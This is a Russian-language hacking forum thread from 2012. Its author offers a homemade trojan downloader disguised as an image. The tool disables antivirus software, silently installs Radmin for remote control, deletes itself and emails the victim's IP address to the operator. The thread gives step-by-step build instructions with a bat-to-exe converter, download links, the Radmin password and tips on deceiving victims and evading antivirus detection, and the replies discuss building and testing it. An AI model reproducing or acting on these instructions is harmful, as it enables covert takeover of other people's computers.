My Downloader.

Тема в разделе "Stealers|:|Formgrabbers|:|Keyloggers", создана пользователем ToBapuw_XaKep, 9 янв 2012.

  1. ToBapuw_XaKep
    ToBapuw_XaKep Новичок
    Симпатии:
    8
    Итак, представляю вам мой, на первый взгляд простой dowloader.
    Что отличает его от остальных: да ничем особенным *mrgreen*, кроме того, что сам файл никакими "гигантами" АВ аka касперский или др.веб не палится, да к тому же при запуске делает их не работоспособными.
    Отчет об файле:
    PHP:
    http://virusscan.jotti.org/ru/scanresult/27f3b6c3957d1d6d906619228073a538213823d7
    Никакими языками не написан, основан на batнике, откомпилирован
    ИТОГ:
    + не надобность в крипторах(почти полная) и джойнерах
    + вес сопоставим с какой нибудь фоткой
    + нужно только искусство впаривания, ну как у любого трояна
    + антивирусы что не воздействуют тоже приятно =)
    - не тестировался на avast и avira. в них самая опасность так как они самые не предсказуемые и самые у.банские(по моему мнению) АВ=)

    Вот моя "бета" версия, файл смаскирован под картинку, заливает Radmina
    (выбрал его потому что с ним больше беспалевности, да и сам он крутой)
    скачивает на диск C:\ и запускает. Кроме этого ничего нет. Пока=)
    Скачать: Кликни сюда

    Кого заинтересовало - вышлю основной код в ЛС, туда я уже успел впихать и отсылку ip на почту)
    УБЕДИТЕЛЬНАЯ ПРОСЬБА: если вы сомневаетесь в чистоте этого файла НЕ заливайте его на VIRUSTOTAL. И открывать его на своем компьютере тоже не следует *mrgreen*

    UPDATE!
    Типо My downloader v 2.0*mrgreen*
    итак, что изменилось:

    [+] теперь файл скачивается и запускается не на диск, а на "незаметную" директорию
    [+] включено самоудаление после запуска
    [+] самое главное: отправка ip на почту ^^

    СПАСИБО ЗА ВДОХНОВЛЕНИЕ ВОТ ЭТОМУ АВТОРУ И ЕГО ПОСТУ
    PHP:
    http://www.xaker.name/forvb/showthread.php?t=20588
    а теперь инструкция:
    погнали!
    вот наш распакованный архив:
    [​IMG]
    первым, что мы редактируем - это файл install.bat
    перед тем, как это делать, мы регистрируем почту на yandex.ru
    а теперь внимание на картинку =)
    [​IMG]
    все оставляем на своих местах, кроме полей, написанных на русском
    в первые два логина мы пишем только что зарегистрированные логины, где пароль - тот же самый. Конечно же скобки удаляем.
    Дальше в последнее поле ставим свой логин, куда придет ip адрес
    самое сложное позади:)
    больше ничего редактировать не станем.
    теперь за нас все сделает Converter
    [​IMG]
    открываем, в поле batch file выбираем install.bat
    save as не трогаем
    остальное - по желанию
    во вкладке include добавляем файлы: blat.exe, blat.lib, blat.dll, realip.exe, block_reader.sys
    Жмем compile, получаем install.exe
    aipic.su_img_img3_fs_4.1326126516.jpg
    Но это - не конец.
    Опять*mrgreen* открываем converter.
    Процедура та же самая, только файлы чуть другие.
    В первой вкладке указываем батник main.bat
    Во вкладке include добавляем wget.exe и только что приготовленный install.exe
    Но! для меньшей палевности , по желанию, можно сделать нашему файлу иконку. Для этого существует вкладка Versioninformtions. Думаю это не так трудно. В конце концов кликаем COMPILE
    И ТЕПЕРЬ, когда мы "испекли" наш файл. Остается только изменить его имя и впарить кому хочешь и куда хочешь.
    ГОТОВО!:)

    Если что не понятно, пишите, попытаюсь разъяснить. Вроде написал разборчиво и доходчиво))

    Какие проблемы могут возникнуть:
    - Запуск на незнакомой ОС (Vista и Семерка не тестировались)
    - Неправильное написание логинов в батнике( ну это надо постараться)
    - Впаривание компьютерному гению с over9000 антивирусов.
    - Если вы уж совсем новичок, то лучше не пытаться

    Ах да, чуть не забыл :D
    СКАЧАТЬ!!!
    КЛИК

    PS: НЕ ЛЕНИТЕСЬ СОБИРАТЬ САМИ!;) ЭТО МНОГОГО НЕ ТРЕБУЕТ
     
    Последнее редактирование: 5 мар 2012
    9 янв 2012
  2. KaeraK
    KaeraK Guest
    А если нету диска C: ?
     
    9 янв 2012
  3. chimatii
    chimatii Глобальный модератор
    Симпатии:
    73
    Hidden Content:
    **Hidden Content: To see this hidden content your post count must be 30 or greater.**
     
    9 янв 2012
  4. onthar
    onthar Продвинутый
    Симпатии:
    224
    У них политика не отличается от вирустотала.
     
    9 янв 2012
  5. ToBapuw_XaKep
    ToBapuw_XaKep Новичок
    Симпатии:
    8
    это пока только упрощенная версия, над этим я пока думаю да и не только над этим. Когда полностью доработаю - покажу))

    onthar, спасибо за замечание, просто наслышен что VT гавно, особо в онлайн проверках не разбираюсь. Посоветуйте тогда более подходящий
     
    9 янв 2012
  6. onthar
    onthar Продвинутый
    Симпатии:
    224
    из бесплатных пока у chk4me.com репутация более менее.
     
    9 янв 2012
    1 человеку нравится это.
  7. ToBapuw_XaKep
    ToBapuw_XaKep Новичок
    Симпатии:
    8
    aigera,
    вот эти, видимо не убивает.
    да он их не убивает, просто делает их менее работоспособными)
    ЗЫ: 8 штук- не половина))
    из них реальная проблема - avira. Хотя Она ругается на любые файлы скачанные с инета :D .
    ничего троянского в самом лоадере нету.

    Добавлено через 19 минут
    сейчас тестировал на symantech + avast
    на файл и на радмин не ругались.
    я уж думал круто, потом увидел что symantech заругался на realip(
    надеюсь, что это единичный случай
     
    Последнее редактирование: 9 янв 2012
    9 янв 2012
  8. aigera
    aigera Новичок
    Симпатии:
    3
    10 янв 2012
  9. ToBapuw_XaKep
    ToBapuw_XaKep Новичок
    Симпатии:
    8
    да, он скачивает radmina с хостинга, и это та самая ссылка скачки файла.
    про пароль совсем забыл, о черт.
    ^^
    privedmidved - такой пароль.
    впринципе вместо этой ссылки можно вставить любую другую с любым другим трояном, стилером итп. Главное - результат

    если что-то еще забыл добавить/написать - вы пишите, а то это у меня первая тема, да и память девичья :D
     
    10 янв 2012
  10. aigera
    aigera Новичок
    Симпатии:
    3
    что то не так! все зделал по мануалу, залил в http://rghost.ru/35841084 картинку (для проверки) запустил у себя но не запустилась картинка у меня(((
     
    10 янв 2012
  11. ToBapuw_XaKep
    ToBapuw_XaKep Новичок
    Симпатии:
    8
    aigera,
    проверьте ЛС
     
    11 янв 2012
  12. Bedolaga
    Bedolaga Новичок
    Симпатии:
    0
    - Запуск на незнакомой ОС (Vista и Семерка не тестировались)

    Под этим подразумевается машина жертвы или того кто делает троян ?
     
    11 янв 2012
  13. ToBapuw_XaKep
    ToBapuw_XaKep Новичок
    Симпатии:
    8
    Bedolaga,
    жертвы.
     
    11 янв 2012
  14. Bedolaga
    Bedolaga Новичок
    Симпатии:
    0
    Сделал троя. Встал другой вопрос, если он заливает Radmin жертве, то у меня должен быть Radmin Viewer как я понял .Если да, то имеет ли значение какой версии.У меня версия 3 . И как понять делает антивирусы не работоспособными? Могу ли я испытать его на себе?
     
    11 янв 2012
  15. ToBapuw_XaKep
    ToBapuw_XaKep Новичок
    Симпатии:
    8
    От версии viewera не зависит. Сборка с 2.x версией радмина.
    у меня например 3.4, проблем нет.
    Насчет испытания его на себе, не советую:)
    ничего с файлами и реестром не будет, ничего не удаляется. Просто ... вобщем двумя словами истекает ключ. Можно попробовать вместо ссылки на радмин вставить ссылку скачки картинки например с контакта. Вот тогда и испытывайте. Только за сохранность антивируса я не отвечаю *mrgreen*

    PS: и все таки лучше не испытывать)
    дедик или тот же радмин - сервер ( достать их можно разными способами ) - отличные варианты
     
    11 янв 2012
  16. Bedolaga
    Bedolaga Новичок
    Симпатии:
    0
    Запустил трой . Пришло письмо PERFECTLY! .Real Ip это пароль для входа на компьютер жертвы? Он почему то одинаков с паролем моей почты, что то не так прописал в .bat файле или так должно быть? Извиняюсь за флуд, но думаю и другие будут задавать вопросы наподобие моих.
     
    11 янв 2012
  17. ToBapuw_XaKep
    ToBapuw_XaKep Новичок
    Симпатии:
    8
    Real ip - это ip адрес жертвы, который приходит вам на почту. Это одна из функций даунлоадера. Назначается для всяких backdooroв , radminoв, которые подключаются по ip адресу.
    Пароль к radminу я уже писал, он - privedmidved.
    если вам приходит ваш пароль от почты тут точно что-то не так ;D. советую batник не трогать, кроме того что я описал в теме. Другое дело если ваш пароль - ваш ip адрес, что мало вероятно))

    Добавлено через 1 минуту
    Напишите ваши вопросы лучше в личку, чем сюда, потому что их набралось у вас много.
     
    Последнее редактирование: 11 янв 2012
    11 янв 2012
  18. vkodm
    vkodm Новичок
    Симпатии:
    0
    То onthar. А что если отсылать на почтовики? Яндекс - проверятся Вэбом, @i.ua - Каспером. Если создать несколько почт а на одной сделать сбор с других. Файл рассылать на почты и смотреть на каких не дошла - значит тот АВ бочит. Конечно не видно что находит (как распознает и какую составную), но... Теперь вопрос - не отсылают ли почтовики производителям АВ эти "подозрительные" файлы?
     
    6 фев 2012
  19. TDI
    TDI Новичок
    Симпатии:
    32
    в касперском вроде по умалчанию стоит отправка подозрительных файлов
     
    6 фев 2012
  20. vkodm
    vkodm Новичок
    Симпатии:
    0
    Я имею ввиду не АВ установленный на системе. А те которые установлены на "почтах" yandex mail.ru rambler и т.д. Чтоб не заливать на ВирусТотал а проверить на почтовиках. Прошел - все ОК. Нет - работаем дальше.
     
    6 фев 2012
Загрузка...